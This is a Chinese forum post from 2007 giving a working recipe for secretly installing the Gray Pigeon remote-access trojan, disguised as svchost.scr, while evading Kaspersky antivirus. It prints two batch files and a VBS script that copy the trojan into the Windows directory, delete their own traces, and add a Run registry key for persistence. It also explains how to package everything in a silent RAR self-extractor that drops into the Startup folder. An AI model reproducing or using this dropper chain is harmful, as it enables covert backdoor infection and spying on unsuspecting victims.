|
|
发表于 2007-12-4 10:47:55
|
显示全部楼层
|阅读模式
来自 广东省广州市白云区
用到的东西有:
1.灰鸽子木马1个 (单EXE的..不是释放DLL的那种) [svchost.scr]
2.批处理文件2个 [1.bat / 2.bat]
3.VBS脚本文件1个 [1.vbs]
4.RAR自解压缩功能
木马的配置跟上次不同.上次木马端在启动文件夹里运行..被发现了..删除是很容易的
今天木马终于可以自定义位置了 就放 %systemroot%跟目录下(WIN目录)
木马名称为 svchost.scr ,配置鸽子时不选择写注册表.. 但要插IE进程
端口设置为8080或80..
批处理1.bat的内容为
@echo off
@COPY svchost.scr %systemroot%\\svchost.scr (将当前文件夹的svchost.scr复制到%systemroot%目录下)
@del /q /f /s svchost.scr(删除当前文件夹的svchost.scr)
@del /q /f /s 1.vbs(删除当前文件夹的1.vbs)
@start shutdown -l -t 0(注销系统,\"这一步可以不要\")
@del %0(删除自身)
批处理2.bat的内容为
@echo off
@reg add \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v lin /t REG_SZ /d %systemroot%\\svchost.scr /f (写入注册表.将%systemroot%\\svchost.scr 列为启动项目)
@start %systemroot%\\svchost.scr(运行%systemroot%下的svchost.scr)
@del %0 (删除自身)
VBS脚本内容为
Set ws = CreateObject(\"Wscript.Shell\")
ws.run \"cmd /c 1.bat\",vbhide
(隐藏运行批处理文件1.bat)
===========================================
用RAR自解压缩把 svchost.scr / 1.bat /2.bat /1.vbs 一起做成自解压缩文件..设置为隐蔽运行..释放到启动文件夹
并在解压缩后运行1.vbs
这样..启动文件夹还留了一个 2.bat 等注销后..批处理会比卡巴先运行写入注册表..而且删除自身..自此启动文件夹内干净
了.木马也种在卡巴启动完成之前中植好了..... |
|
